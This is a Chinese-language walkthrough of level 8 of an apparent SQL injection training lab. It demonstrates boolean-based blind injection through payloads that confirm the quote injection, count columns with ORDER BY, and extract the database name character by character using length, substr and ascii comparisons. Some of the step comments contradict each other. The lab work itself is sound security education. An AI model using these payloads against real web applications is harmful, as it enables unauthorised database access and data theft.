第8关

输入?id=1

 发现出现了 you are in....

一、判断注入类型

输入?id=1'

 发现刚才那句 you are in...（正常页面）  不见了，说明注入方式是包含单引号的

输入?id=1' and 1=1 --+ 和?id=1' and 1=2 --+

 

 当 and 1=1，有英文  and 1=2， 没英文  而在刚才尝试的时候也没有出什么报错信息，和回显信息

所以很像盲注boolean,因为反反复复就是2个画面，一个有英文，一个没英文

二、查看一下有多少字段

输入?id=1' order by 5--+ 

 发现不是正常页面，用二分法继续

 

 发现字段为3

三、查找数据库的长度

输入：?id=1' and length(database())>4--+

 

发现数据库的长度大于4

继续查找

输入：?id=1' and length(database())>8--+

 

 当>7的时候是正常页面

而>8不是正常页面

所以数据库的长度8

四、查找数据库的名字

先把数据库库名的第一个拿出来判断

输入?id=1' and substr((database()),1,1)='q' --+

 

 当输入s的时候，出现了正常页面，所以该库名的第一个字母就是s，这样用字母一个个试 效率有点低

可以用ascii函数，提高点效率

如：输入?id=1' and ascii(substr((database()),1,1))>110 --+

 可以看出第一个字母大于d

 可以看出第二字母也大于n

 可以看出，第一个字母小于115（s）

 大于114（r）

那么第一个字母就是115了，也就是s

再根据这个步骤把库名的剩余7个字母给凑出来

爆表，爆字段的时候也是重复爆库的步骤就可以了